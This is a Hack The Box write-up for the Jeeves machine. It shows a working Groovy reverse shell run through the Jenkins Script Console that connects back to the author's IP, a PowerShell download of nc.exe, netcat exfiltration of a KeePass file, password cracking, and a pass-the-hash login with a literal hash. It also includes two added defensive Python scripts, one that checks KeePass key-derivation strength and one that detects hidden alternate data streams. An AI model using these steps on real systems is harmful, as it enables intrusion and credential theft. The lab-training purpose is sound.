Jeeves – Hack The Box

Overall Summary

Jeeves is a Windows machine from Hack The Box that can be exploited through Jenkins by running a Groovy reverse shell. Privilege escalation requires finding a kdbx file and using John the Ripper to get the password that opens it. The file contains some usernames and passwords, but to gain administrative privileges we will need to use a technique called “Pass the hash”. Overall, the machine is easy but does require some research to understand how to proceed.

Scanning and Enumeration

A full TCP nmap scan shows four open ports.


Browsing to the HTTP service on port 80 displays a page that looks like a search engine.


Typing anything in the search box only returns an error.


I also ran gobuster but couldn’t find anything there. The other HTTP service, running on port 50000, also displayed a page which didn’t seem to contain any interesting information.


Running gobuster against the HTTP service on port 50000 did return an interesting directory.


Browsing to this directory displays a page for Jenkins 2.87, as stated at the bottom of the page.

Exploitation

Achieving RCE with Jenkins can be very simple, as it has an option to execute scripts through the “Script Console” feature. This feature can be accessed by clicking “Manage Jenkins” and then “Script Console”, after which we will be presented with the following screen:

From this box we can execute Groovy scripts, which allows us to get a reverse shell. To get a reverse shell I’ll use a script from GitHub that can be found here:

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

and change the addressing information to my IP address and port number. This is the script I’ll be using:

String host="10.10.14.21"; int port=443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

I’ll then set up a netcat listener and run the script to get a reverse shell as jeeves\kohsuke.


Post-Exploitation

Privilege escalation requires a few steps. If we go to the Documents folder of the user kohsuke we will see a file named CEH.kdbx.


Trying to view the contents of the file doesn’t return any readable information. I later found out that this file type is used by a password manager on Windows and that I could open it using KeePass on my Linux machine. I first had to download the file to my attacking machine. To accomplish this I first uploaded nc.exe (the Windows version of netcat) to the target machine using PowerShell, hosting the binary on my attacking machine with Python’s SimpleHTTPServer. This is the PowerShell command I used:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.21/nc.exe','nc.exe')"


Once the binary was downloaded to the target machine I used it to transfer the CEH.kdbx file. This is the command used on the attacking machine to receive the file:

nc -lnvp 4321 > CEH.kdbx

And this is the command I used on the target machine to send the file using the binary I had uploaded:

nc.exe -nv 10.10.14.21 4321 < C:\Users\kohsuke\Documents\CEH.kdbx

Once I had downloaded the file to my attacking machine I had to install keepass2, because version 2 is the one that introduced the kdbx format. I found this out by reading the following link:

https://fileinfo.com/extension/kdbx

We can simply install keepass2 by running the following commands in Kali Linux:

sudo apt-get update
sudo apt-get install keepass2

Once the tool was installed I attempted to open the file, but I noticed that a password was required.


Researching more about the file type and how I could get the password, I came across keepass2john, a tool that extracts a hash from the file which can then be used to brute force the password with John the Ripper. The first thing I did was run the tool and save its output to a file named “tocrack”. This is the command I used:

keepass2john CEH.kdbx > tocrack

I then used John the Ripper with the rockyou.txt wordlist to brute force the password and successfully got the password “moonshine1”.
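Why keepass2john can produce something crackable without knowing the password: the KDBX outer header is stored in the clear, and it holds the seeds, IV and AES-KDF round count that the key derivation needs. The parser below is an added example written for this post, not a tool from the box or from the KeePass project. It reads a KDBX 3.x outer header, pulls out the same parameters keepass2john exports, and flags a low round count, which is what makes a wordlist attack like the one above cheap. The header it parses is a constructed sample with fixed seeds, not the real CEH.kdbx, and the 100,000-round threshold is an assumption picked for the example, not a KeePass default.

```python
import struct
from dataclasses import dataclass, field

# KeePass 2.x (.kdbx) file signature: two little-endian u32 values at offset 0.
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67

# Outer-header field IDs used by the KDBX 3.x format.
FIELD_NAMES = {
    0: "EndOfHeader", 1: "Comment", 2: "CipherID", 3: "CompressionFlags",
    4: "MasterSeed", 5: "TransformSeed", 6: "TransformRounds",
    7: "EncryptionIV", 8: "ProtectedStreamKey", 9: "StreamStartBytes",
    10: "InnerRandomStreamID",
}
AES_CIPHER_ID = bytes.fromhex("31c1f2e6bf714350be5805216afc5aff")


@dataclass
class KdbxHeader:
    major: int
    minor: int
    fields: dict = field(default_factory=dict)

    @property
    def transform_rounds(self):
        raw = self.fields.get("TransformRounds")
        return struct.unpack("<Q", raw)[0] if raw else None


def parse_kdbx_header(data: bytes) -> KdbxHeader:
    """Parse the plaintext outer header of a KDBX 3.x file.

    Everything returned here sits in the clear before the encrypted payload,
    which is why a crackable hash can be built without the master password.
    """
    if len(data) < 12:
        raise ValueError("too short to be a KDBX file")
    sig1, sig2, minor, major = struct.unpack("<IIHH", data[:12])
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KeePass 2.x (.kdbx) file")
    if major != 3:
        raise ValueError(f"only KDBX 3.x headers are handled here, got {major}.{minor}")
    hdr = KdbxHeader(major, minor)
    pos = 12
    while True:
        if pos + 3 > len(data):
            raise ValueError("truncated header")
        fid, size = struct.unpack("<BH", data[pos:pos + 3])  # id u8, length u16
        pos += 3
        value = data[pos:pos + size]
        if len(value) != size:
            raise ValueError("truncated header field")
        pos += size
        if fid == 0:
            break
        hdr.fields[FIELD_NAMES.get(fid, f"Unknown{fid}")] = value
    return hdr


def crack_parameters(hdr: KdbxHeader) -> dict:
    """The header values an offline guesser needs (the same ones keepass2john exports)."""
    return {
        "rounds": hdr.transform_rounds,
        "master_seed": hdr.fields["MasterSeed"].hex(),
        "transform_seed": hdr.fields["TransformSeed"].hex(),
        "iv": hdr.fields["EncryptionIV"].hex(),
        "stream_start_bytes": hdr.fields["StreamStartBytes"].hex(),
        "aes": hdr.fields.get("CipherID") == AES_CIPHER_ID,
    }


def weak_kdf(hdr: KdbxHeader, min_rounds: int = 100_000) -> bool:
    """Flag databases whose AES-KDF round count keeps wordlist attacks cheap.

    The 100,000 threshold is an assumption chosen for this example, not a KeePass setting.
    """
    return hdr.transform_rounds is None or hdr.transform_rounds < min_rounds


def _field(fid: int, value: bytes) -> bytes:
    return struct.pack("<BH", fid, len(value)) + value


def build_sample_header(rounds: int = 6000) -> bytes:
    """Constructed KDBX 3.1 header with fixed seeds; this is NOT the CEH.kdbx from the box."""
    return (
        struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)       # version 3.1
        + _field(2, AES_CIPHER_ID)
        + _field(3, struct.pack("<I", 1))                      # gzip compression
        + _field(4, bytes(range(32)))                          # MasterSeed
        + _field(5, bytes(range(32, 64)))                      # TransformSeed
        + _field(6, struct.pack("<Q", rounds))                 # TransformRounds
        + _field(7, bytes(16))                                 # EncryptionIV
        + _field(9, bytes(range(64, 96)))                      # StreamStartBytes
        + _field(0, b"\r\n\r\n")                               # EndOfHeader
    )


if __name__ == "__main__":
    h = parse_kdbx_header(build_sample_header())
    print(crack_parameters(h))
    print("weak KDF:", weak_kdf(h))
```

Pointing `parse_kdbx_header` at the first kilobyte of a real database works the same way; the round count it reports is the single biggest lever a database owner has against the attack shown on this box, since every extra round multiplies the cost of each guess john has to make.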


I went back to KeePass2, used the password I had obtained, and successfully got access to the contents of the file, which displays some usernames and passwords.


To get a password we would simply select the entry we want, right-click on it and then select “Copy Password”; this copies the actual password as it was stored. The one I had luck with was the “Backup stuff” password, which turned out to be a hash instead of a password.


With this I can still try a technique called “Pass the hash”, which allows me to log in to the target machine using the hash itself. I’ll use a tool already installed in Kali Linux named pth-winexe. This is the command I’ll use to try to get a cmd shell as the user Administrator:

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe

I was able to successfully log in and become the Administrator user.

The Trick About The Flag

The root flag for this machine is stored in the Desktop folder of the Administrator user, like on any other machine in Hack The Box, but there was one last challenge here to read the root.txt flag: the file located in the Desktop folder is named “hm.txt” and it says to look deeper.


This is where I learned about “Alternate Data Streams”, which is basically the ability of the NTFS file system to store more than one data stream in a file. To look at the hidden file we would have to issue the following command:

dir /r


We can now see the root.txt file, but we still need to read it to get the flag. To read the flag we can simply use the “more” command, as I learned by reading this article:

http://www.flexhex.com/docs/articles/alternate-streams.phtml

This is the command that can be used to read the flag:


more < hm.txt:root.txt
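The same trick works against defenders: data hidden in an alternate stream is invisible to a plain `dir` and to most file-size checks, so hunting for unexpected streams is worth automating. The script below is an added example written for this post, not something from the box or from Microsoft. It parses `dir /r` output, returns every `host:stream:$DATA` entry it finds, and drops the one stream Windows itself writes routinely (Zone.Identifier, the mark-of-the-web on downloaded files) so that only unexpected streams remain. The listing it runs on is a constructed sample, not a capture from Jeeves, and the benign-stream list is an assumption for the example.

```python
import re

# Constructed sample of `dir /r` output; not a capture from the Jeeves box.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/08/2017  10:05 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM            84,992 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               2 File(s)         85,028 bytes
               2 Dir(s)  2,000,000,000 bytes free
"""

# A stream line is indented, carries only a size, and names host:stream:$DATA.
# The unnamed default stream is never listed, so every match is an alternate stream.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Streams Windows writes routinely on its own; an assumption made for this example.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_alternate_streams(dir_output: str):
    """Return (host_file, stream_name, size_in_bytes) for every ADS listed by `dir /r`."""
    found = []
    for line in dir_output.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(dir_output: str):
    """Drop the well-known benign streams so only unexpected ones remain for review."""
    return [s for s in find_alternate_streams(dir_output) if s[1] not in BENIGN_STREAMS]


if __name__ == "__main__":
    for host, stream, size in suspicious_streams(SAMPLE_DIR_R):
        print(f"{host}:{stream} ({size} bytes) -> read with: more < {host}:{stream}")
```

Feed it the saved output of `dir /r /s` from a directory you care about and every unexpected stream comes back with its host file and size, ready to be read with the `more <` redirection used above.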